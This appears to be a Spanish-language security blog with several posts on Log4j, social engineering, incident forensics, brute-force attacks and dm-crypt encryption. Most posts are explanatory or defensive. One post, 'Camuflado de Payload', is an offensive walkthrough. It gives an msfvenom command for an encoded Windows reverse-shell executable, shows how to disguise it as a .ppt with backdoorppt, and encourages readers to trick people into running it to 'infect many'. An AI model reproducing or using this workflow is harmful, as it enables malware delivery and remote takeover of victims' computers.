viernes, 17 de diciembre de 2021

#log4jvulnerability día cero para la muerte

 

log4j 0 days to death

Como ya es de saber por prácticamente toda la comunidad en Internet y mas específicamente aficionados a la tecnología se descubrió una vulnerabilidad bastante grave sobre esta librería en java de la Apache Software Foundation aunque lo primero que se debe conocer es ¿Qué es esta librería y para que es usada? y lo podemos conocer gracias a la siguiente cita de wikipedia:

Log4j es una biblioteca de código abierto desarrollada en Java por la Apache Software Foundation que permite a los desarrolladores de software escribir mensajes de registro, cuyo propósito es dejar constancia de una determinada transacción en tiempo de ejecución. Log4j permite filtrar los mensajes en función de su importancia. La configuración de salida y granularidad de los mensajes es realizada en tiempo de ejecución mediante el uso de archivos de configuración externos. Log4J ha sido implementado en otros lenguajes como: C, C++, C#, Perl, Python, Ruby y Eiffel. Fuente: Wikipedia.

Teniendo ya una mejor idea continuamos con la siguiente interrogante ¿Quien descubre esta vulnerabilidad tan grave?.

Esta vulnerabilidad tan grave fue descubierta por el equipo de Alibaba Cloud en noviembre del presente año 2021, aunque ya la misma ha sido subsanada por el equipo desarrollo de Apache Software Foundation mediante una actualización que parchea esta vulnerabilidad.

Pero todo no quedó allí a pesar de la actualización Sin embargo, el viernes pasado se publicó un exploit para Log4Shell que permite a un atacante ejecutar el código de su elección en un servidor afectado.

En otras palabras, el código malicioso puede ser ejecutado desde cualquier sitio, y lo que empeora la situación es que se están descubriendo variantes de esta vulnerabilidad que se pueden aprovechar y afectan todos los sitios web que utilicen log4j.

De momento los hackers sombrero negro, que se están aprovechando de esta vulnerabilidad la están usando en primer lugar para minería de criptomonedas aprovechando los recursos de hardware de servidores y en segundo lugar para crear botnets para ataques DDoS y otros tipos de ataques aun más sofisticados aprovechando de los recursos de hardware de estas botnets.

Un gran problema que pueda durar años.

Lamentablemente debido a la complejidad para el parcheado de esta vulnerabilidad es posible que le misma perdure por años si las instituciones privadas y publicas no dan prioridad a la sulición inmediata de esta vulnerabilidad.

Una vulnerabilidad con calificación record.

Al ser una de las vulnerabilidades más criticas y graves entre las descubiertas en los últimos años, ESET calificó esta vulnerabilidad con un puntaje de 10 sobre 10 en la escala de CVSS (Common Vulnerability Scoring System)

¿Qué medidas se puede tomar para subsanar este problema si utilizo esta librería en mis servicios ofrecidos?.

De momento actualizar dicha librería a su ultima versión e implementar políticas de seguridad más estricta además de respaldos más recurrentes y un constante monitorio de los servicios ofrecidos bajo el uso de esta librería y estar constantemente informándose de posible salida de parches de seguridad para subsanar esta vulnerabilidad.

Otra opción si se tiene un servicio en línea sobre y no es crucial para la operación tomar la medida de cerrar el servicio temporalmente e implementar otras opciones más seguras al respecto siempre realizando un correcto análisis de seguridad al respecto antes de implementar otra solución.


Si te gusto esta publicación no dudes en realizar un donativo del menú "Ayúdame" esto me ayudará a seguir dedicándole tiempo al blog.


Fuentes:

https://www.alibabacloud.com/es/notice/log4j2

https://www.infobae.com/america/tecno/2021/12/15/nueva-vulnerabilidad-en-log4j-esta-alarmando-al-mundo-entero-podria-afectar-a-minecraft-twitter-y-mas/

https://support.eset.com/es/alert8188-informacion-acerca-de-la-vulnerabilidad-log4j2

https://www.dw.com/es/log4j-la-vulnerabilidad-que-amenaza-la-ciberseguridad-en-todo-el-mundo/a-60119154

martes, 21 de abril de 2020

Seguridad informática más a fondo



Muchos piensan que la seguridad informática es algo inherente a un programa que los programas informáticos son 100% pero la realidad es otra, es muy pero muy importante primeramente tener en cuenta que todo software informático no es 100% y que en algún momento se descubrirá algún método para vulnerarlo, ni los sistemas de cifrado más complejos serán fiables en un futuro cercado debido al aumento de la capacidad de procesamiento de los super computadores, servidores, y computadores personales en un futuro no tan lejano los sistemas de cifrado actualmente siendo los más seguros lo dejarán de ser ya que un simple ataque por fuerza bruta en cuestión de unas copas horas o tal vez solo minutos serán descifrados.

¿Por que en la seguridad informática se tiene que ir más a fondo?.

Por que debemos generar una cultura de que nuestros datos personales son algo valioso que otros no pueden tener en sus manos, agregando a esto debemos generar medidas para resguardar nuestra información de la manera más segura posible.

En este blog lo que se busca que generar conciencia con respecto a la seguridad de la información, y que en cada país hay un marco legal para tratar un tema tan delicado como lo son los delitos informáticos, derechos de autor, licencias, entre otros.

No es fácil en un mundo informatizado donde Internet al alcance de un click puedes conseguir cualquier tipo información no incurrir en una infracción de derechos de autor, licencia o incluso manejar información robada de una empresa o institución, teniendo en cuenta que tenemos la misma responsabilidad por la información que manejemos así se tenga conocimiento o no de las leyes que las rigen.

Por esto a todo usuario o seguidor se le recomienda siempre tratar que cuando se maneje una información verifique su fuente, o si son sus datos personales no hacerlos públicos en Internet ya que esto puede acarrear todo tipo de problemas legales.

¿Cual es la recomendación?.

Primeramente estar al pendiente de problemas de seguridad de los software o herramientas, de que manera se pueden solventar, y siempre estar al tanto de noticias del mundo de la tecnología en general, nuevos métodos de seguridad entre otros al menos dedicar al día unos 20 minutos al aprendizaje y a informarse al respecto, puede marcar la diferencia en la buena implementación de medidas de seguridad en su entorno de trabajo u el hogar.


Si te gusto esta publicación no dudes en realizar un donativo del menú "Ayúdame" esto me ayudará a seguir dedicándole tiempo al blog.


martes, 14 de enero de 2020

Ingeniería social "una de las armas de un Hacker"



La ingeniería social, para los hackers es el arma por lo general más efectiva para poder obtener datos claves para acceder a informaciones privadas de las personas, quizás es el método más sencillo y eficaz de todos.

Un concepto más acertado lo podemos encontrar en wikipedia el cual se cita a continuación:
La Ingeniería social es la práctica de obtener información confidencial a través de la manipulación de usuarios legítimos. Es una técnica que pueden usar ciertas personas para obtener información, acceso o permisos en sistemas de información1​ que les permitan realizar algún acto que perjudique o exponga la persona u organismo comprometido a riesgos o abusos.
El principio que sustenta la ingeniería social es el que en cualquier sistema "los usuarios son el eslabón débil".
Fuente: wikipedia.
Teniendo una idea de lo que es la ingeniería social las técnicas más comunes para aplicarla suelen ser:
  1. Phishing: Este usa generalmente medios como correos electrócinos (email) haciéndose pasar por el sistema de la empresa en la que trabaja o las entidades bancarias que maneja la persona para obtener información de acceso u otros datos.
  2. Vishing: Este método usa llamadas telefónicas donde la persona que llama se hace pasar por soporte técnico o representante de la empresa o entidad bancaria con el fin de obtener datos de acceso o información clave.
  3. Baiting: Este método es un poco más elaborado ya que este requiere de un dispositivo de almacenamiento extraíble (CD, DVD, BR, USB, SD) infectado con un virus generalmente troyano el cual infecta el computador u ordenador de la victima, recopila información y la envía por internet al atacante.
  4. Quid pro quo: su signicado es "algo por algo", el atacante llama a números aleatorios en una empresa, alegando estar llamando de nuevo desde el soporte técnico. Esta persona informará a alguien de un problema legítimo y se ofrecerá a ayudarle, durante el proceso conseguirá los datos de acceso y lanzará un malware.
Teniendo en cuenta esta información, tenemos que tener conciencia y nunca confiar de llamadas de desconocidos o de correos que nos ofrecen una cantidad de dinero a cambio de un pago, o correos que requieran nuestros datos bancarios o información privada, las entidades bancarias nunca requieren nuestros datos personales o de acceso vía electrónica.

Se tiene que tener extremo cuidado con unidades de almacenamiento extraible siempre analizarlas con detenimiento en un ordenador que disponga de buen antivirus o en su defecto formatear la unidad antes de montarla, ojo si encuentras un pendrive preguntate primero en que lugar lo encontraste por que estaba misteriosamente allí si es en las cercanías de tu casa u oficina, y te darás una idea de los posibles fines mal intencionados que tiene.

Nota importante: La seguridad de la información, nos compete a tod@s, ya sea manipulemos información mediante teléfonos, computadores u otros aparatos computacionales, sea en el hogar o en el trabajo.


Si te gusto esta publicación no dudes en realizar un donativo del menú "Ayúdame" esto me ayudará a seguir dedicándole tiempo al blog.

lunes, 21 de octubre de 2019

Pasos a seguir para la recuperación de datos rastro de un ataque (informática forense).


Lo primero que debemos saber es que es un ciber ataque, podemos citar el siguiente concepto:

En computadoras y redes de computadoras un ataque es un intento de exponer, alterar, desestabilizar, destruir, eliminar para obtener acceso sin autorización o utilizar un activo. Un ciberataque o ataque informático, es cualquier maniobra ofensiva de explotación deliberada que tiene como objetivo de tomar el control, desestabilizar o dañar un sistema informático (ordenador, red privada, etcétera). El atacante es un individuo u organización que intenta obtener el control de un sistema informático para utilizarlo con fines maliciosos, robo de información o de hacer daño a su objetivo. Un ciberataque utiliza códigos maliciosos, para corromper los códigos, datos privados o algoritmos, generando consecuencias que comprometen y vulneran la seguridad de los sistemas de información.
Fuente: Wikipedia

Teniendo ya una mejor idea con el concepto citado y tomando como punto de partida el caso de que, ya, se haya realizado un ataque a un sistema informático, Que pasos ó métodos debemos seguir para recopilar información en base a los rastros dejados por el ó la atacante o atacantes en dicho sistema informático o información vulnerada.

En los siguientes pasos se describirá de manera resumida que pasos se suelen seguir usualmente:

Primer paso:

Lo primero que se debe hacer es poner los equipos o sistema informático en una especie de cuarentena donde no sea utilizado o siga en producción una vez que se detecte que se ha perpetrado un ataque sobre los mismos o el mismo, ya que esto podría borrar los datos que son rastros de un ataque.

Segundo paso:

Determinar el alcance del ataque y en que momento se ejecuto, para determinar el alcance nos podemos dar una idea con el siguiente texto citado de wikipedia:


  • Daños triviales: Daños que no ocasionan ninguna pérdida grave de funcionalidad del sistema y que originan una pequeña molestia al usuario. En este tipo de daños los VIRUS que los causan son muy fáciles de remover y eliminar, por lo que se pueden quitar solo en segundos o minutos.
  • Daños menores: Daños que ocasionan una pérdida de la funcionalidad de las aplicaciones que poseemos. En el peor de los casos se tendrá que reinstalar las aplicaciones afectadas. En este tipo de daños se tiene que tener en cuenta el VIRUS Jerusalén. Este virus, los viernes 13, borra todos los programas que uno trate de usar después de que el virus haya infectado la memoria. Lo peor que puede suceder es que tocaría volver a instalar los programas borrados por dicho virus.
  • Daños moderados: Este daño sucede cuando un virus formatea el disco duro y/o mezcla los componentes de la tabla de asignación de archivos (en inglés, File Allocation Table FAT) y/o también puede que sobrescriba el disco duro. Sabiendo esto se puede reinstalar el sistema operativo y usar el último respaldo de datos.
  • Daños mayores: Algunos virus pueden pasar desapercibidos y pueden lograr que ni utilizando el backup se pueda llegar a los archivos. Un ejemplo es el virus Dark Avanger que infecta los archivos acumulando. Cuando llega a 16, el virus escoge un sector del disco duro al azar y en ella escribe:  "Eddie lives... somewhere in time" (Eddie vive... en algún lugar del tiempo) Cuando el usuario se percata de la existencia del virus ya será demasiado tarde pues los archivos más recientes estarán infectados con el virus.
  • Daños severos: Los daños severos son hechos cuando los VIRUS hacen cambios mínimos y progresivos. El usuario no sabe cuando los datos son correctos o han cambiado, pues no se ve fácilmente, como en el caso del VIRUS Dark Avanger. También hay casos de virus que infectan aplicaciones que al ser descontaminadas estas aplicaciones pueden presentar problemas o perder funcionalidad.
  • Daños ilimitados: Algunos programas como CHEEBA, VACSINA.44.LOGIN y GP1 entre otros, obtienen la clave del administrador del sistema. En el caso de CHEEBAS, crea un nuevo usuario con el privilegio máximo poniendo el nombre del usuario y la clave. El daño lo causa la tercera persona, que ingresa al sistema y podría hacer lo que quisiera.
Fuente: Wikipedia


Tercer paso:

Identificar el tipo de ataque una vez determinados los daños causados ya con esto se tiene una primera pista para determinar el tipo de ataque que se realizó aunque se debe buscar de forma concienzuda para determinar que tipo de ataque se realizó, a continuación se lista algunos de los tipos de ataques más usuales:

Cuarto paso:

Determinar su procedencia sea local (desde que equipo de la intranet se ejecuto) o si proveniente de Internet (este paso requiere seguir direcciones ip hasta su posible fuente aveces se logra descubrir desde que lugar del planeta se efectuó el ataque con mucha precisión).

Para esto se puede hacer recuperando los logs del sistema con textdisk y haciendo un seguimiento de la red con nmap y otros programas.

Quinto paso:

Documentar y guardar toda evidencia posible sin hacer ningún tipo de modificación para posibles litigios legales contra el o los atacantes (esto quiere decir si es necesario mantener la cuarentena de los equipos de hardware afectados y usar otros en sustitución temporal para el funcionamiento de la empresa o particular).

Sexto paso:

Teniendo en cuenta los datos que no fueron afectados por el ataque se procede a restaurar los últimos datos que no fueron afectados por el mismo junto a los respaldos de seguridad si no se tienen respaldos de seguridad se restauran los datos y software que no fueron afectados pero englobándolos con nuevas medidas se seguridad que tengan en cuenta este tipo de ataque.

Si el ataque fue por eliminación de toda la información un excelente programa para recuperar las direcciones de memoria y reconstruir los archivos borrados es testdisk si los mismos no fueron sobre escritos o borrados de forma segura si esto es así ninguna data podrá ser restaurada generando perdidas para la empresa o persona particular.


Estos pasos que listo los realice a mi criterio personal cualquier sugerencia para mejorarlos será bien recibida.

Si te gusto esta entrada no dudes en realizar un donativo en la sección Ayúdame


viernes, 10 de mayo de 2019

Camuflado de Payload


¿Qué es un payload?.

Un payload es una carga que ejecuta una vulnerabilidad o que se aprovecha de la misma, pero el mismo tiene que ser ejecutado por el usuario para poder aprovecharse de esa vulnerabilidad.

Camuflar un payload.

Generalmente es necesario camuflarlo por que si el usuario se percata del archivo extraño no lo ejecutará, eliminará o en otros casos notificará a expertos en seguridad sobre la aparición de ese archivo o el intento por parte del alguien de enviarle un archivo extraño.

¿Qué herramienta esta disponible para ello?.

Existen infinidad de herramientas para crear y y camuflar payloads de hecho a continuación se listan 3 pero se usará para ejemplo solo una.


  1. msfvenom disponible en Hercules (se crea el payload).
  2. Metasploit framework.
  3. Backdoorppt (las más sencilla para usar como ejemplo de camuflado).


Comenzando a camuflar un payload con backdoorppt.

Para el presente ejemplo se usa debian GNU/Linux versión 8 y 9 ejecutar dicha herramienta.

Lo primero es descargarla ya que no se encuentra disponible por defecto en ninguna de las versiones de dicha distribución la podemos obtener con los siguientes comandos:

$ mkdir backdoorppt
$ cd backdoorppt
$ wget https://github.com/r00t-3xp10it/backdoorppt/archive/master.zip

Una vez teniendo el archivo en la pc y estando en la consola en la carpeta donde lo descargamos procedemos al siguiente paso que es descomprimirlo:

$ unzip master.zip

Luego de esto se procede a generar un payload (ojo este es un comando ejemplo para generarlo con msfvenom de Hercules) para ello se debe tener msfvenom + Hercules corriendo en el sistema operativo.

$ msfvenom -a x86 –platform windows -p windows/shell/reverse_tcp LHOST=192.168.1.188 LPORT=1234 -b «\x00» -e x86/shikata_ga_nai -f exe -o /tmp/documento.exe

El siguiente paso es; ejecutar backdoorppt con el siguiente comando como super usuario:

$ ./master/backdoorppt.sh

ó

$ sh master/backdoorppt.sh

Nota: si usas kde como entorno gráfico antes de ejecutar backdoorppt.sh se debe como usuario normal ejecutar el comando:
$ xhost +

El mismo se ejecutará comprobará las dependencias necesarias y como esta adaptado para sistemas tipo debian instalará las dependencias que hagan falta para su funcionamiento en caso de otras distribuciones las dependencias se deben instalar manualmente.

A continuación de mostrará una ventana para seleccionar el archivo ejecutable a camuflar lo eleccionamos pulsamos en "Aceptar" o "Abrir" luego nos mostrará otra ventana que el nombre que queremos darle a nuestro archivo payload camuflado, le damos el nombre por ejemplo: "confidencial",  y pulsamos "aceptar".

Esto generará el payload camuflado, si lo vemos con el comando ls que si nombre y extensión es:

$ ls
confidencial?tpp.exe

Y en el explorador de archivos su nombre es; "confidencial.ppt", solo falta un poco de ingeniería social y aprovecharse de la curiosidad de la gente así lograrás infectar a muchos de esta manera.


Si te gusto esta entrada no dudes en realizar un donativo entrando en la sección de Ayúdame.

martes, 30 de abril de 2019

Ataques por fuerza bruta ¡tu contraseña será mía!


En criptografía, un ataque por fuerza bruta es la forma de recuperar una clave probando todas las combinaciones posibles hasta encontrar aquella que permite el acceso a un sistema informático o a unos datos encriptados.

El concepto más a detalle:
Es el procedimiento por el cual a partir del conocimiento del algoritmo de cifrado empleado y de un par texto claro/texto cifrado, se realiza el cifrado (respectivamente, descifrado) de uno de los miembros del par con cada una de las posibles combinaciones de clave, hasta obtener el otro miembro del par. El esfuerzo requerido para que la búsqueda sea exitosa con probabilidad mejor que la par será   operaciones, donde n es la longitud de la clave (también conocido como el espacio de claves). Fuente: Wikipedia.
¿Qué tan efectivos son los Ataques de Fuerza Bruta?.

Su efectividad varía dependiendo de dos de factores; Tiempo y tenacidad, el proceso para lograr descifrar una contraseña puede llevar una extensa cantidad de tiempo para que llegue a ser exitoso.

Esto quiere decir que un hacker puede durar desde unos minutos hasta posiblemente años para lograr descifrar una contraseña todo esto depende de la longitud y complejidad de la misma. Sin embargo un ataque de fuerza bruta tiene diferentes extrategías para ser ejecutado.

¿Cómo puedo evitar que descifren mi contraseña?.

Para evitar o mitigar un posible acceso a nuestros datos debemos tener una contraseña que sobrepase los 8 digitos y que incluya caracteres alfanuméricos y signos especiales, la misma cambiarla cada cierto tiempo pro ejemplo cada 90 días máximo y que no incluya parcialmente informaciones personales en la construcción de la misma ya que es lo primero que un hacker probaría.

Ataque de Fuerza Bruta, Ataque de Diccionario y Ataque de Tabla Arcoiris.
  1. Ataque diccionario: Por una parte, encontramos los ataques de diccionario. Su lógica es sencilla: Consiste en probar todas las palabras del diccionario. Aunque pareciera mucho trabajo por hacer, la verdad es que suele ser más eficaz que un ataque de fuerza bruta porque muchos usuarios emplean una palabra en su idioma que puedan recordar con más facilidad.
  2. Ataque tabla arcoiris: Parten del valor hash para reproducir los pasos de la cadena hasta obtener la contraseña. Sin embargo, muchas veces el valor no se encuentra en la tabla; por lo que se recrea al reducir el valor con la misma función con la cual se creó la cadena. Este procedimiento se repite hasta conseguir el valor resumen en un punto final. Ahora bien, eso no significa que se ha encontrado la contraseña, sino la cadena de caracteres que al final; terminará revelando el texto plano que compone la contraseña. Se les llaman Tablas Arcoiris porque se asigna un color distinto a cada reducción para evitar confusiones. Al final son tantas las reducciones con sus respectivos colores, que termina por parecer un arcoiris.
  3. Ataque por fuerza bruta: Que consiste en probar todas las combinaciones posibles.
¿Los 3 tipos de ataques se pueden combinar?.

La respuesta es si los ataques de diccionario y arcoiriris pueden complementar el ataque por fuerza bruta para tener mejores resultados en el menor tiempo posible.

Protección en los mecanismos de contraseña contra Ataques de Fuerza Bruta.

Esta protección se realiza con miras a dificultar los ataques de fuerza bruta. Por ejemplo, si el usuario introduce una clave equivocada deberá esperar un corto tiempo antes de intentarlo de nuevo. Esta medida es exponencial, es decir, se va incrementando el lapso de tiempo de espera a medida que se repiten los intentos fallidos. Otra medida drástica es bloquear la cuenta al X número de intentos fallidos, y lanzar una alarma vía inbox en la cuenta asociada.

- Autenticación multifactor.

Muchos sistemas u proveedores de servicio implementan esto para aumentar la dificultad que puedan descifrar o acceder a los datos del usuario o persona.

¿Es necesario hardware especial para ello?.

No necesariamente pero disminuye el tiempo empleado para el ataque en gran medida si se dispone de gran cantidad de recursos de hardware para ello.

Software (Herramientas) para el ataque por fuerza bruta:


Si te gusto esta entrada no dudes en realizar un donativo entrando en la sección de Ayúdame

domingo, 28 de abril de 2019

Cómo crear un disco ó partición encriptada con dm-crypt ¡A prueba de tanques!


¿Qué es dm-crypt?.
 Es un subsistema de cifrado de discos que provee cifrado transparente de dispositivos de bloque utilizando la utilidad cryptoapi del kernel de Linux 2.6. Las escrituras a este dispositivo serán cifradas y las lecturas descifradas. Se podrá montar un sistema de archivos en el mismo de la manera habitual, pero no se podrán acceder los datos sin la clave.
Básicamente realiza lo mismo que cryptoloop, pero posee modos más avanzados de operación, es más adecuado para satisfacer la necesidad de un dispositivo de bloque, y tiene una interfaz de configuración más flexible. El formato on-disk también es compatible.
En Microsoft Windows, los discos cifrados con dm-crypt pueden ser utilizados con FreeOTFE.
     Fuente: Wikipedia.
Creando la unidad o disco encriptado:

Para el ejemplo de como crear una unidad o disco encriptado se usará como base el sistema Operativo Universal Debian GNU/Linux en su versión 8.x aplicable a versiones posteriores.

Lo es verificar si esta disponible en los repositorios con el siguiente comando:

apt-cache search cryptsetup
   
Mostrará lo siguiente:

cryptmount - Management of encrypted file systems
cryptsetup - disk encryption support - startup scripts
cryptsetup-bin - disk encryption support - command line tools
libcryptsetup-dev - disk encryption support - development files
libcryptsetup4 - disk encryption support - shared library
udisks - storage media interface
udisks2 - D-Bus service to access and manipulate storage devices

Como vemos que el paquete esta disponible procedemos a instalarlo con:

apt-get install cryptsetup

Para crear la partición cifrada, se deben ejecutar los siguientes pasos:

Ejecutar cryptsetup en la partición, lo cual crea un dispositivo de mapeo con target crypt.

Crear el sistema de archivos en el nuevo dispositivo.

Montar del nuevo dispositivo.

En el siguiente ejemplo se transformará el volumen físico /dev/sda3z en el volumen lógico (cifrado) en /dev/mapper/privado (en este caso "privado" es la etiqueta del dispositivo descifrado) y se montará en /var/privado.

Para crear el volumen lógico con la librería cryptsetup:

cryptsetup -y create privado /dev/sda3

El parámetro "-y" fuerza al usuario a ingresar dos veces la clave a utilizar.

O crear el volumen lógico con el script cryptsetup que incluye en Debian el paquete hashalot http://packages.debian.org/unstable/utils/hashalot.

cryptsetup -c aes -h ripemd160 -s 32 create privado /dev/sda3

Para confirmar que se haya ejecutado correctamente:

dmsetup ls privado (254, 0)

Crear el sistema de archivos:

mkfs.ext3 /dev/mapper/privado

Montar el sistema de archivos:

mount /dev/mapper/privado /var/privado

Esto es aplicable a una partición que ocupe todo el disco.


Si te gusto esta entrada no dudes en realizar un donativo entrando en la sección de Ayúdame.